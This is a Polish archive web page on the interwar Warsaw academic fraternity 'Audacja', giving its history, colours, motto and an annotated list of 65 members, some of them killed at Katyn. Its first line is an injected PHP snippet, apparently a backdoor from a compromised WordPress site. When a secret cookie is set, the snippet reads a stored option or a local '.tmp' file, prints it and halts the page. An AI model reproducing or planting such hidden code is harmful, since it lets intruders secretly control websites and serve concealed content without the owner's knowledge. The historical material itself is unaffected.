if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Audacja

Dekiel Audacji - vide Poszukiwania. Nazwa:
Polska Akademicka Korporacja “Audacja”
Siedziba:
Warszawa
Data powstania:
5 III 1922 r.
Barwy:
szafirowa – srebrna – stalowa
Dewiza:
„Audaces fortuna iuvat” („Śmiałym los sprzyja”)

Rys historyczny

Herb Audacji, 1923 r.

Audacja została założona dnia 5 III 1922 r. Od dnia 1 IV 1922 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 1 IV 1922 r.). Kandydowała pod opieką K! Welecja. W 1923 r. uzyskała prawa członka rzeczywistego Związku. Zanikła po 1930 r.

Okładka zaproszenia na bal Audacji, 1924 r.

Dnia 8 V 1925 r. zawarła czasowy kartel z K! Helionia z Poznania (do listopada 1925 r.).

Siedziby korporacji mieściły się: w roku akademickim 1924/25 w Kasynie Urzędników Ministerstwa Rolnictwa i Dóbr Państwowych przy ul. Senatorskiej 15, w 1925/26 przy ul. Czackiego 11/8, w latach 1927-1929 przy ul. Krakowskie Przedmieście 99/1, w 1929/30 przy ul. Marszałkowskiej 72, a w 1930/31 przy ul. Krakowskie Przedmieście 69.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 65 nazwisk.

Brak wiadomości o powojennej działalności Audacji i spotkaniach jej członków.

Pierwsza strona zaproszenia na bal Audacji, 1924 r.

Lista członków

Poniższa, niekompletna lista członków Audacji obejmuje 65 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

 1. Stanisław Adamski, student UW, c. 1927/28, akt. 1927/28-31, prezes sem. let. 1929/30
 2. Stefan Baum, student WSH, c. 1925/26, akt. 1925/26-31
 3. Czesław Bączkowski, student WSH, od 1930 UW, c. 1927/28, akt. 1927/28-31
 4. Jerzy Borowski, akt. 1924-26
 5. Jerzy Czaki (Czahi), student WSW, c. 1929/30, akt. 1929/30-31
 6. Stanisław Domaszewicz, akt. 1924-26, wystąpił
 7. Józef Duda, student PW, c. 1924/25, akt. 1924/25-31
 8. Stefan Figlarowicz, akt. 1924-26
 9. Jan Giedroyć, student PW, akt. 1924-29
 10. Stanisław Gołoński, założyciel (?) Audacji, akt. 1922 (?) -26
 11. Władysław Herink, c. 1924, akt. 1924-26, sekretarz sem. let. 1924/25
 12. Włodzimierz Jaś, akt. 1929-30
 13. Stefan Jegliński, student UW, c. 1929/30, akt. 1929/30-31
 14. Włodzimierz Leszczyński, student WSH, akt. 1930-31, wiceprezes sem. zim. 1930/31
 15. Kazimierz Kamiński, założyciel Audacji, akt. 1922-26

  Bronisław Kasiński, 1922 r.

 16. Bronisław Kasiński, student PW, od 1930 PL, założyciel Audacji, akt. 1922-30, wiceprezes sem. zim. oraz sem. let. 1924/25, por. rez., w czasie wojny w 1 Kompanii IV Batalionu Samodzielnej Brygady Strzelców Podhalańskich, walczył pod Narwikiem

 17. Marjan Kasiński, (23 grudnia 1899 w Kramatorskaja na Ukrainie - 1940 w Katyniu) s. Kazimierza (prof. AG w Krakowie) i Jadwigi z Hłasków, żołnierz I Korpusu Polskiego gen. Józefa Dowbor-Muśnickiego oraz WP 1918-20, student i absolwent Ekonomii WSH, założyciel Audacji, akt. 1922-26, sekretarz zewn. ZPKA 1925 (IV kadencja), sekretarz wewn. ZPKA 1925-27 (V kadencja), autor “Katechizmu smyków” (Korporant 1925, nr 2), po studiach kierownik oddziału koncernu naftowego, a następnie doradca w Instytucie Naukowej Organizacji i Kierownictwa w Warszawie, ppor. rez. piechoty, przydzielony do 36 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 18. Mieczysław Keller, student SGGW, c. 1929/30, akt. 1929/30-31, sekretarz sem. zim. 1930/31
 19. Dominik Kęsik, c. 1924/25, akt. 1924/25, skreślony 1924/25
 20. Stanisław Kiok, (19 września 1900 w Jordanowicach - 1940 w Charkowie), s. Ludwika i Wandy z Rejcheldów, w wojnie polsko-rosyjskiej 1920 w 1, a następnie 6 Pułku Artylerii Lekkiej, student i absolwent 1928 chemii PW, założyciel Audacji, akt. 1922-28, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1929, por. rez. uzbr., w niewoli sowieckiej, zamordowany przez NKWD, odznaczony Medalem 1918-21
 21. Henryk Kleinert, założyciel Audacji, akt. 1922-26
 22. Tadeusz Kowalewski, student UW, c. 1930/31, akt. 1930/31
 23. Stanisław Kubissa, c. 1925/26, akt. 1925/26
 24. Z. Kunkel, skreślony
 25. Andrzej Lutrosiński, student UW, UP 1927/28 (?), założyciel Audacji, akt. 1922-28, prezes sem. zim. oraz sem. let. 1924/25
 26. Rajmund Łączyński, c. 1924/25, akt. 1924/25
 27. Zdzisław Łyżyński, c. 1929/30, akt. 1929/30
 28. Juljusz Marcoin, (15 listopada 1901 w Sarajewie - po 1967) s. Bolesława, absolwent Gimnazjum oo. Jezuitów w Chyrowie, uczestnik wojny polsko-bolszewickiej 1920, student PL, student i absolwent Wydziału Górniczego AG 1924-31, początkowo członek lwowskiej Korporacji Scythia, w Audacji akt. 1925-29, później być może także w Gnomii (?), po studiach pracował m.in. w kopalnich “Artur” w Sierszy Wodnej, “Zbyszek” w Sierszy, zastępca dyrektora działu planowania w Cnetralnym Zarządzie Przemysłu Węglowego 1947-50, starszy inspektor budowy nowych kopalń w Centralnym Zarządzie Budownictwa Węglowego 1950-55, naczelnik wydziału planowania w Ministerstwie Górnictwa i Energetyki w Katowicach 1956-61, od 1963 na rencie
 29. Józef Markiewicz, student PW, c. 1924/25, akt. 1924/25-29
 30. Jerzy Mączyński, student UW, od 1930 student Politechniki w Pradze, c. 1927/28, akt. 1927/28-31
 31. Marjan Michalski, student UW, c. 1929/30, akt. 1929/30-31
 32. Zbigniew Nienirowicz (Niewirowicz), student WSH, c. 1929/30, akt. 1929/30-31
 33. Eugeniusz Nadstawny, akt. 1924-25
 34. Wacław Noskowski, student SGGW, c. 1929/30, akt. 1929/30-31, olderman sem. zim. 1930/31
 35. Bohdan Nowak-Koliński, student PW, założyciel (?) Audacji, akt. 1922 (?) - 29
 36. Eugeniusz Nowakowski, akt. 1929-30, II wiceprezes sem. let. 1929/30
 37. Lucjan Nowakowski, student UW, c. 1927/28, akt. 1927/28-31, sekretarz sem. let. 1929/30
 38. Pannenko, akt. 1925-26
 39. Tadeusz Paszewski, student SGGW, c. 1925/26, akt. 1925/26-31
 40. Władysław Peszkowski, student Politechniki w Paryżu, akt. 1924-31
 41. Wacław Piotrowski, student WSH, akt. 1924-29, sekretarz sem. let. 1925/26, wiceprezes sem. let. 1927/28, wiceprezes sem. zim. 1928/29
 42. Tadeusz Plebanek, ( - 1939-45 w Olsztynie) akt. 1924-25, rozstrzelany przez Niemców w czasie wojny
 43. Gustaw Rychter, c. 1924, akt. 1924-26
 44. Kazimierz Sielski, student PW, akt. 1924-31, olderman sem. zim. 1924/25
 45. Roman Sikorski, student PW, c. 1927/28, akt. 1927/28
 46. Leszek Siwik, c. 1924/25, akt. 1924/25
 47. Stanisław Skarżyński, ( - 1942) akt. 1924-25, pilot, znany z przolotu z Senagalu do Brazylii w 1933, płk, w czasie wojny pilot RAF, zginął wracając z nalotu na Bremę
 48. Sylwester Skarżyński, student WSH, akt. 1924-29, w 1929 pracownik Banku Polskiego w Radomiu
 49. Stefan Smoczyński, akt. 1924-26
 50. Tadeusz Stachlewski, c. 1924/25, akt. 1924/25-26
 51. Witold Steinborn, c. 1924/25, akt. 1924/25-31
 52. Tadeusz Straburzyński, akt. 1924-25

  Stefan Szpachta, lata wojny.

 53. Stefan Mikołaj Szpachta, (6 grudnia 1905 w Warszawie - 22 marca 1943 w Warszawie) s. Jana i Bronisławy z Lewandowskich, student UW i Politechniki w Pradze, akt. 1927-31, sekretarz sem. let. 1927/28, sekretarz sem. zim. 1928/29, po studiach pracownik Państwowych Zakładów Tele i Radiotechnicznych w Warszawie oraz Polskiego Radia w Warszawie, absolwent Szkoły Podchorążych Rezerwy Piechoty w Zambrowie, kapral rez. 39 Pułku Piechoty Legii Akademickiej, zmarł na suchoty, pochowany w grobie rodzinnym na warszawskich Powązkach (brama IV kwatera S-1)

 54. Jan Wacław Śliwonik, (1 stycznia 1899 w Warszawie - 1940 w Katyniu) s. Stanisława i Józefy ze Słowińskich, w 1920 członek obsługi stacji polowej radiolegrafu nr 5 w 2 Dywizji Piechoty, student i absolwent 1929 chemii PW, akt. 1924-31, prezes sem. let. 1925/26, absolewnt Szkoły Podchorążych Łączności w Zegrzu, por. rez., przydzielony do 2 odziału służby uzbrojenia, w niewoli rosyjskiej, zamordowany przez NKWD
 55. Zdzisław Tacikowski, student UW, akt. 1927-31, I wiceprezes sem. let. 1929/30
 56. Tadeusz Targoński, student PW, od 1930 UW, c. 1925/26, akt. 1925/26-31, prezes i olderman sem. let 1927/28, prezes i olderman sem. zim. 1928/29, olderman sem. let. 1929/30, prezes sem. zim. 1930/31, prawnik, adwokat
 57. Sławomir Tomaszewski, akt. 1924-25
 58. Jacek Trawiński, (1900-1971) student i absolwent WSH, akt. 1924-31, wiceprezes sem. let. 1925/26, dyplomata, od 1929 pracownik Konsulatu Generalnego RP w Londynie, następnie sekretarz wiceministra Becka w Centrali MSZ, od 1933 attache poselstwa i kierownik Wydziału Konsularnego Poselstwa w Tokio, a następnie I sekretarz poselstwa i charge d’affaires ad interim do przyjazdu Tadeusza Romera, po powrocie do kraju radca w Wydziale Wschodnim MSZ
 59. Zygmunt Nałęcz-Tymiński, student WSH, c. 1924/25, akt. 1924/25-31
 60. A. Waśniewski, wystąpił 1928
 61. Zbigniew Wiszniewski (Wiśniewski), akt. 1924-26, sekretarz sem. zim. 1924/25

  Stanisław Włodarkiewicz, 1926 r.

 62. Stanisław Włodarkiewicz, (?), (28 kwietnia 1900 w Kolonii Huta Bankowa [obecnie Dąbrowa Górnicza] - 18 grudnia 1945 w Londynie) s. Stefana i Heleny z Nowakowskich, absolwent Szkoły Realnej Towarzystwa Szkół Średnich w Sosnowcu, od 1920 student i absolwent WSH, od 1923 referent prasowy Konsulatu Generalnego w Bytomiu, od 1931 referendarz, a następnie radca w Wydziale Prasowym Centrali MSZ, II sekretarz, a następnie I sekretarz poselstwa w Austrii 1936-38, po Anschlussie radca w Wydziale Organizacji Międzynarodowych, od 1939 w Londynie, sekretarz ministra pracy i opieki społecznej Jana Stańczyka 1939-43, kierownik referatu w Wydziale Niemieckim MSZ 1943-45, pochowany na rzymsko-katolickim Cmentarzu św. Marii w Londynie

 63. Adam Złocki, student UW, akt. 1924-29
 64. Antoni Żurawicz, akt. 1924-25
 65. Zdzisław Żyżyński, student UK (?), c. 1930/31, akt. 1930/31

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1924-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz wiadomości od rodzin członków korporacji.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 2 IX 2010 r.
Ostatnia zmiana: 10 I 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Akademicka Korporacja “Audacja” (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 10 I 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }